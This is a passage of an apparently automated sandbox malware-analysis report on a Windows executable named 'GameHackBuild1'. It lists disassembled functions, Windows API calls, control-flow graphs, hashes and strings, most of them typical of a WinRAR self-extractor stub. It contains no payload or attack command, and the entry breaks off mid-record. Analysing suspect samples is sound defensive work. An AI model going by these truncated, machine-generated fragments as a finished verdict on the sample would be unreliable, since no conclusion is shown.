                                      • Opcode Fuzzy Hash: 7498fb9e7530962b23755534e66d1bb8d839221fd8ac3d38f68144dfe3b5e878
                                      • Instruction Fuzzy Hash: 8D319576208302AFCB10DFA1EC59D9BBBADFF85751B044518F946D2260DB71DC42DBA1
                                      Function 00A0A5F4 Relevance: 7.6, APIs: 5, Instructions: 107fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 966 a0a5f4-a0a61f call a1e360 969 a0a691-a0a69a FindNextFileW 966->969 970 a0a621-a0a632 FindFirstFileW 966->970 971 a0a6b0-a0a6b2 969->971 972 a0a69c-a0a6aa GetLastError 969->972 973 a0a6b8-a0a75c call a0fe56 call a0bcfb call a10e19 * 3 970->973 974 a0a638-a0a64f call a0b66c 970->974 971->973 975 a0a761-a0a774 971->975 972->971 973->975 980 a0a651-a0a668 FindFirstFileW 974->980 981 a0a66a-a0a673 GetLastError 974->981 980->973 980->981 983 a0a684 981->983 984 a0a675-a0a678 981->984 988 a0a686-a0a68c 983->988 984->983 987 a0a67a-a0a67d 984->987 987->983 990 a0a67f-a0a682 987->990 988->975 990->988
                                      APIs
                                      • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00A0A4EF,000000FF,?,?), ref: 00A0A628
                                      • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00A0A4EF,000000FF,?,?), ref: 00A0A65E
                                      • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00A0A4EF,000000FF,?,?), ref: 00A0A66A
                                      • FindNextFileW.KERNEL32(?,?,?,?,?,?,00A0A4EF,000000FF,?,?), ref: 00A0A692
                                      • GetLastError.KERNEL32(?,?,?,?,00A0A4EF,000000FF,?,?), ref: 00A0A69E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: FileFind$ErrorFirstLast$Next
                                      • String ID:
                                      • API String ID: 869497890-0
                                      • Opcode ID: eba045a3ee5fecc0f92435ee094ced7b30ec0b288a6128511804f58130c40215
                                      • Instruction ID: c152b7d9290f48e014214811440ae5bd3f178188888c7ea6d53b6f15437bd96a
                                      • Opcode Fuzzy Hash: eba045a3ee5fecc0f92435ee094ced7b30ec0b288a6128511804f58130c40215
                                      • Instruction Fuzzy Hash: 7C41C372508345AFC724EF68D984ADAF7F8FF59340F040A2AF5D9D3280D735A9948B92
                                      Function 00A2753D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?,00A27513,?,00A3BAD8,0000000C,00A2766A,?,00000002,00000000), ref: 00A2755E
                                      • TerminateProcess.KERNEL32(00000000,?,00A27513,?,00A3BAD8,0000000C,00A2766A,?,00000002,00000000), ref: 00A27565
                                      • ExitProcess.KERNEL32 ref: 00A27577
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: f2f99659585d302e34f3abd2acf004bc37ca87a85f236c7b335916bcf95a1180
                                      • Instruction ID: b004df791d91f889b4b5331c5a5ef15812165ae267a6244b7ce4c69e34bca894
                                      • Opcode Fuzzy Hash: f2f99659585d302e34f3abd2acf004bc37ca87a85f236c7b335916bcf95a1180
                                      • Instruction Fuzzy Hash: 78E0B632008958ABCF11EFA8EE09A49BB69EB51741F108424F9068A232CB35DF83CA50
                                      Function 00A0857B Relevance: 3.9, APIs: 2, Instructions: 947COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: H_prolog_memcmp
                                      • String ID:
                                      • API String ID: 3004599000-0
                                      • Opcode ID: a330aa061aa881dd4c6a21bf94c55f2a7a40af90d608e3b2140bd9b0002e9acb
                                      • Instruction ID: 8fe0ba9cbd1f23855654732ceeabf00e0acd9e9da2ce0e32734f4c3fb462196b
                                      • Opcode Fuzzy Hash: a330aa061aa881dd4c6a21bf94c55f2a7a40af90d608e3b2140bd9b0002e9acb
                                      • Instruction Fuzzy Hash: 89823A3090424DAEDF25DF60D985BFEBBB9AF15300F0841B9E8999B1C3DB355A48CB64
                                      Function 00A16646 Relevance: .3, Instructions: 325COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: bd3b77ca1e8dca3d0724ad473eed9300b063b81f721f588fd23516349432eea5
                                      • Instruction ID: 754e447e7b78520e55d49fce2f71434fc8527f6c03f33d071e6ddd6026f20e78
                                      • Opcode Fuzzy Hash: bd3b77ca1e8dca3d0724ad473eed9300b063b81f721f588fd23516349432eea5
                                      • Instruction Fuzzy Hash: D9D105B1A043458FDB14CF28C9807DBBBE4BF95348F08456DE884DB642D734E999CB9A
                                      Function 00A1AEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00A1AEE5
                                        • Part of subcall function 00A0130B: GetDlgItem.USER32(00000000,00003021), ref: 00A0134F
                                        • Part of subcall function 00A0130B: SetWindowTextW.USER32(00000000,00A335B4), ref: 00A01365
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: H_prologItemTextWindow
                                      • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                      • API String ID: 810644672-3617005944
                                      • Opcode ID: 8f4d94e3be8fef420f1801ead8942b53b0365600a887ce46f090a4ec39f90e2b
                                      • Instruction ID: 83d2d0b5e91773c3cc4123916cc65195e5de31a84f3c339a8943d2fc0ee18bca
                                      • Opcode Fuzzy Hash: 8f4d94e3be8fef420f1801ead8942b53b0365600a887ce46f090a4ec39f90e2b
                                      • Instruction Fuzzy Hash: 3B42F4B5954254BEEB21EBF0AD8AFEE7B7CAB12705F000154F605A60D1CBB94D86CB31
                                      Function 00A100CF Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 317libraryfileloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 257 a100cf-a100ee call a1e360 GetModuleHandleW 260 a100f0-a10107 GetProcAddress 257->260 261 a10154-a103b2 257->261 262 a10121-a10131 GetProcAddress 260->262 263 a10109-a1011f 260->263 264 a10484-a104b3 GetModuleFileNameW call a0bc85 call a0fe56 261->264 265 a103b8-a103c3 call a270dd 261->265 262->261 266 a10133-a10152 262->266 263->262 278 a104b5-a104bf call a0acf5 264->278 265->264 272 a103c9-a103fa GetModuleFileNameW CreateFileW 265->272 266->261 276 a10478-a1047f CloseHandle 272->276 277 a103fc-a1040a SetFilePointer 272->277 276->264 277->276 279 a1040c-a10429 ReadFile 277->279 285 a104c1-a104c5 call a10085 278->285 286 a104cc 278->286 279->276 282 a1042b-a10450 279->282 284 a1046d-a10476 call a0fbd8 282->284 284->276 294 a10452-a1046c call a10085 284->294 291 a104ca 285->291 289 a104ce-a104d0 286->289 292 a104f2-a10518 call a0bcfb GetFileAttributesW 289->292 293 a104d2-a104f0 CompareStringW 289->293 291->289 296 a1051a-a1051e 292->296 301 a10522 292->301 293->292 293->296 294->284 296->278 300 a10520 296->300 302 a10526-a10528 300->302 301->302 303 a10560-a10562 302->303 304 a1052a 302->304 306 a10568-a1057f call a0bccf call a0acf5 303->306 307 a1066f-a10679 303->307 305 a1052c-a10552 call a0bcfb GetFileAttributesW 304->305 312 a10554-a10558 305->312 313 a1055c 305->313 317 a10581-a105e2 call a10085 * 2 call a0ddd1 call a0400a call a0ddd1 call a19f35 306->317 318 a105e7-a1061a call a0400a AllocConsole 306->318 312->305 315 a1055a 312->315 313->303 315->303 324 a10667-a10669 ExitProcess 317->324 318->324 325 a1061c-a10661 GetCurrentProcessId AttachConsole call a235b3 GetStdHandle WriteConsoleW Sleep FreeConsole 318->325 325->324
                                      APIs
                                      • GetModuleHandleW.KERNEL32(kernel32), ref: 00A100E4
                                      • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00A100F6
                                      • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00A10127
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00A103D4
                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A103F0
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A10402
                                      • ReadFile.KERNEL32(00000000,?,00007FFE,00A33BA4,00000000), ref: 00A10421
                                      • CloseHandle.KERNEL32(00000000), ref: 00A10479
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00A1048F
                                      • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00A104E7
                                      • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00A10510
                                      • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00A1054A
                                        • Part of subcall function 00A10085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A100A0
                                        • Part of subcall function 00A10085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A0EB86,Crypt32.dll,00000000,00A0EC0A,?,?,00A0EBEC,?,?,?), ref: 00A100C2
                                      • _swprintf.LIBCMT ref: 00A105BE
                                      • _swprintf.LIBCMT ref: 00A1060A
                                        • Part of subcall function 00A0400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A0401D
                                      • AllocConsole.KERNEL32 ref: 00A10612
                                      • GetCurrentProcessId.KERNEL32 ref: 00A1061C
                                      • AttachConsole.KERNEL32(00000000), ref: 00A10623
                                      • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00A10649
                                      • WriteConsoleW.KERNEL32(00000000), ref: 00A10650
                                      • Sleep.KERNEL32(00002710), ref: 00A1065B
                                      • FreeConsole.KERNEL32 ref: 00A10661
                                      • ExitProcess.KERNEL32 ref: 00A10669
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                      • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                      • API String ID: 1201351596-3298887752
                                      • Opcode ID: c06b9a0681abc6da5182b4a52263968ea42d36d65a1ff9dce74fb9580516b984
                                      • Instruction ID: fb3771a4cf580088a3ea5577cf2bd5d4f8178f6ab8fb5f985890c5769413bdbe
                                      • Opcode Fuzzy Hash: c06b9a0681abc6da5182b4a52263968ea42d36d65a1ff9dce74fb9580516b984
                                      • Instruction Fuzzy Hash: 50D17FB210C384ABDB30DF50DD49FDFBAE8BF85705F50491DF6899A140DBB486898B62
                                      Function 00A1BDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 406 a1bdf5-a1be0d call a1e28c call a1e360 411 a1ca90-a1ca9d 406->411 412 a1be13-a1be3d call a1aa36 406->412 412->411 415 a1be43-a1be48 412->415 416 a1be49-a1be57 415->416 417 a1be58-a1be6d call a1a6c7 416->417 420 a1be6f 417->420 421 a1be71-a1be86 call a117ac 420->421 424 a1be93-a1be96 421->424 425 a1be88-a1be8c 421->425 427 a1ca5c-a1ca87 call a1aa36 424->427 428 a1be9c 424->428 425->421 426 a1be8e 425->426 426->427 427->416 439 a1ca8d-a1ca8f 427->439 430 a1bea3-a1bea6 428->430 431 a1c132-a1c134 428->431 432 a1c115-a1c117 428->432 433 a1c074-a1c076 428->433 430->427 438 a1beac-a1bf06 call a19da4 call a0b965 call a0a49d call a0a5d7 call a070bf 430->438 431->427 436 a1c13a-a1c141 431->436 432->427 435 a1c11d-a1c12d SetWindowTextW 432->435 433->427 437 a1c07c-a1c088 433->437 435->427 436->427 440 a1c147-a1c160 436->440 441 a1c08a-a1c09b call a27168 437->441 442 a1c09c-a1c0a1 437->442 495 a1c045-a1c05a call a0a52a 438->495 439->411 446 a1c162 440->446 447 a1c168-a1c176 call a235b3 440->447 441->442 444 a1c0a3-a1c0a9 442->444 445 a1c0ab-a1c0b6 call a1ab9a 442->445 450 a1c0bb-a1c0bd 444->450 445->450 446->447 447->427 463 a1c17c-a1c185 447->463 457 a1c0c8-a1c0e8 call a235b3 call a235de 450->457 458 a1c0bf-a1c0c6 call a235b3 450->458 483 a1c101-a1c103 457->483 484 a1c0ea-a1c0f1 457->484 458->457 464 a1c187-a1c18b 463->464 465 a1c1ae-a1c1b1 463->465 464->465 469 a1c18d-a1c195 464->469 471 a1c1b7-a1c1ba 465->471 472 a1c296-a1c2a4 call a0fe56 465->472 469->427 475 a1c19b-a1c1a9 call a0fe56 469->475 477 a1c1c7-a1c1e2 471->477 478 a1c1bc-a1c1c1 471->478 485 a1c2a6-a1c2ba call a217cb 472->485 475->485 496 a1c1e4-a1c21e 477->496 497 a1c22c-a1c233 477->497 478->472 478->477 483->427 486 a1c109-a1c110 call a235ce 483->486 490 a1c0f3-a1c0f5 484->490 491 a1c0f8-a1c100 call a27168 484->491 505 a1c2c7-a1c318 call a0fe56 call a1a8d0 GetDlgItem SetWindowTextW SendMessageW call a235e9 485->505 506 a1c2bc-a1c2c0 485->506 486->427 490->491 491->483 512 a1c060-a1c06f call a0a4b3 495->512 513 a1bf0b-a1bf1f SetFileAttributesW 495->513 523 a1c220 496->523 524 a1c222-a1c224 496->524 499 a1c261-a1c284 call a235b3 * 2 497->499 500 a1c235-a1c24d call a235b3 497->500 499->485 534 a1c286-a1c294 call a0fe2e 499->534 500->499 516 a1c24f-a1c25c call a0fe2e 500->516 541 a1c31d-a1c321 505->541 506->505 511 a1c2c2-a1c2c4 506->511 511->505 512->427 518 a1bfc5-a1bfd5 GetFileAttributesW 513->518 519 a1bf25-a1bf58 call a0b4f7 call a0b207 call a235b3 513->519 516->499 518->495 529 a1bfd7-a1bfe6 DeleteFileW 518->529 550 a1bf6b-a1bf79 call a0b925 519->550 551 a1bf5a-a1bf69 call a235b3 519->551 523->524 524->497 529->495 533 a1bfe8-a1bfeb 529->533 537 a1bfef-a1c01b call a0400a GetFileAttributesW 533->537 534->485 546 a1bfed-a1bfee 537->546 547 a1c01d-a1c033 MoveFileW 537->547 541->427 545 a1c327-a1c33b SendMessageW 541->545 545->427 546->537 547->495 549 a1c035-a1c03f MoveFileExW 547->549 549->495 550->512 556 a1bf7f-a1bfbe call a235b3 call a1f350 550->556 551->550 551->556 556->518
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00A1BDFA
                                        • Part of subcall function 00A1AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00A1AAFE
                                      • SetWindowTextW.USER32(?,?), ref: 00A1C127
                                      • _wcsrchr.LIBVCRUNTIME ref: 00A1C2B1
                                      • GetDlgItem.USER32(?,00000066), ref: 00A1C2EC
                                      • SetWindowTextW.USER32(00000000,?), ref: 00A1C2FC
                                      • SendMessageW.USER32(00000000,00000143,00000000,00A4A472), ref: 00A1C30A
                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A1C335
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                      • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                      • API String ID: 3564274579-312220925
                                      • Opcode ID: 6804ae0df9bd545b33a88b2dc0c2ffb71b19610b0266e4168ef1ca3f9ac81aa3
                                      • Instruction ID: c1706b324f6710175ad705a64911b1251d9f408b1425f1c1cb589f66f9701f43
                                      • Opcode Fuzzy Hash: 6804ae0df9bd545b33a88b2dc0c2ffb71b19610b0266e4168ef1ca3f9ac81aa3
                                      • Instruction Fuzzy Hash: 99E1A372D44228AADF25EBA4ED45EEF737DAF09351F0041A6F509E3090EB749EC58B60
                                      Function 00A0D341 Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 555COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 561 a0d341-a0d378 call a1e28c call a1e360 call a215e8 568 a0d37a-a0d3a9 GetModuleFileNameW call a0bc85 call a0fe2e 561->568 569 a0d3ab-a0d3b4 call a0fe56 561->569 573 a0d3b9-a0d3dd call a09619 call a099b0 568->573 569->573 580 a0d7a0-a0d7a6 call a09653 573->580 581 a0d3e3-a0d3eb 573->581 585 a0d7ab-a0d7bb 580->585 583 a0d409-a0d438 call a25a90 * 2 581->583 584 a0d3ed-a0d405 call a13781 * 2 581->584 595 a0d43b-a0d43e 583->595 594 a0d407 584->594 594->583 596 a0d444-a0d44a call a09e40 595->596 597 a0d56c-a0d58f call a09d30 call a235d3 595->597 601 a0d44f-a0d476 call a09bf0 596->601 597->580 606 a0d595-a0d5b0 call a09bf0 597->606 607 a0d535-a0d538 601->607 608 a0d47c-a0d484 601->608 620 a0d5b2-a0d5b7 606->620 621 a0d5b9-a0d5cc call a235d3 606->621 612 a0d53b-a0d55d call a09d30 607->612 610 a0d486-a0d48e 608->610 611 a0d4af-a0d4ba 608->611 610->611 614 a0d490-a0d4aa call a25ec0 610->614 615 a0d4e5-a0d4ed 611->615 616 a0d4bc-a0d4c8 611->616 612->595 631 a0d563-a0d566 612->631 636 a0d52b-a0d533 614->636 637 a0d4ac 614->637 618 a0d519-a0d51d 615->618 619 a0d4ef-a0d4f7 615->619 616->615 623 a0d4ca-a0d4cf 616->623 618->607 626 a0d51f-a0d522 618->626 619->618 625 a0d4f9-a0d513 call a25ec0 619->625 627 a0d5f1-a0d5f8 620->627 621->580 642 a0d5d2-a0d5ee call a1137a call a235ce 621->642 623->615 630 a0d4d1-a0d4e3 call a25808 623->630 625->580 625->618 626->608 632 a0d5fa 627->632 633 a0d5fc-a0d625 call a0fdfb call a235d3 627->633 630->615 643 a0d527 630->643 631->580 631->597 632->633 650 a0d633-a0d649 633->650 651 a0d627-a0d62e call a235ce 633->651 636->612 637->611 642->627 643->636 654 a0d731-a0d757 call a0ce72 call a235ce * 2 650->654 655 a0d64f-a0d65d 650->655 651->580 691 a0d771-a0d79d call a25a90 * 2 654->691 692 a0d759-a0d76f call a13781 * 2 654->692 658 a0d664-a0d669 655->658 660 a0d97c-a0d984 658->660 661 a0d66f-a0d678 658->661 662 a0d98a-a0d98e 660->662 663 a0d72b-a0d72e 660->663 665 a0d684-a0d68b 661->665 666 a0d67a-a0d67e 661->666 669 a0d990-a0d996 662->669 670 a0d9de-a0d9e4 662->670 663->654 667 a0d880-a0d891 call a0fcbf 665->667 668 a0d691-a0d6b6 665->668 666->660 666->665 693 a0d976-a0d979 667->693 694 a0d897-a0d8c0 call a0fe56 call a25885 667->694 672 a0d6b9-a0d6de call a235b3 call a25808 668->672 673 a0d722-a0d725 669->673 674 a0d99c-a0d9a3 669->674 677 a0d9e6-a0d9ec 670->677 678 a0da0a-a0da2a call a0ce72 670->678 709 a0d6e0-a0d6ea 672->709 710 a0d6f6 672->710 673->658 673->663 681 a0d9a5-a0d9a8 674->681 682 a0d9ca 674->682 677->678 679 a0d9ee-a0d9f4 677->679 696 a0da02-a0da05 678->696 679->673 686 a0d9fa-a0da01 679->686 688 a0d9c6-a0d9c8 681->688 689 a0d9aa-a0d9ad 681->689 695 a0d9cc-a0d9d9 682->695 686->696 688->695 698 a0d9c2-a0d9c4 689->698 699 a0d9af-a0d9b2 689->699 691->580 692->691 693->660 694->693 721 a0d8c6-a0d93c call a11596 call a0fdfb call a0fdd4 call a0fdfb call a258d9 694->721 695->673 698->695 704 a0d9b4-a0d9b8 699->704 705 a0d9be-a0d9c0 699->705 704->679 711 a0d9ba-a0d9bc 704->711 705->695 709->710 716 a0d6ec-a0d6f4 709->716 717 a0d6f9-a0d6fd 710->717 711->695 716->717 717->672 720 a0d6ff-a0d706 717->720 723 a0d70c-a0d71a call a0fdfb 720->723 724 a0d7be-a0d7c1 720->724 754 a0d94a-a0d95f 721->754 755 a0d93e-a0d947 721->755 731 a0d71f 723->731 724->667 726 a0d7c7-a0d7ce 724->726 729 a0d7d0-a0d7d4 726->729 730 a0d7d6-a0d7d7 726->730 729->730 733 a0d7d9-a0d7e7 729->733 730->726 731->673 735 a0d808-a0d830 call a11596 733->735 736 a0d7e9-a0d7ec 733->736 744 a0d832-a0d84e call a235e9 735->744 745 a0d853-a0d85b 735->745 738 a0d805 736->738 739 a0d7ee-a0d803 736->739 738->735 739->736 739->738 744->731 747 a0d862-a0d87b call a0dd6b 745->747 748 a0d85d 745->748 747->731 748->747 756 a0d960-a0d967 754->756 755->754 757 a0d973-a0d974 756->757 758 a0d969-a0d96d 756->758 757->756 758->731 758->757
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00A0D346
                                      • _wcschr.LIBVCRUNTIME ref: 00A0D367
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00A0D328,?), ref: 00A0D382
                                      • __fprintf_l.LIBCMT ref: 00A0D873
                                        • Part of subcall function 00A1137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00A0B652,00000000,?,?,?,00010444), ref: 00A11396
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                      • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                      • API String ID: 4184910265-980926923
                                      • Opcode ID: 97f20226d492b223ad98bd90efb43aa897330e390fa890b79deb81b99192f312
                                      • Instruction ID: 963e841a80cb1044671904c8f7235819c3d3b2fc87f25e2401cac7af5094fc55
                                      • Opcode Fuzzy Hash: 97f20226d492b223ad98bd90efb43aa897330e390fa890b79deb81b99192f312
                                      • Instruction Fuzzy Hash: 3912AD7290021DAADF24DFA8ED81BEEB7B5BF04300F10456AF505A72C2EB709A44CB24
                                      Function 00A1CB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
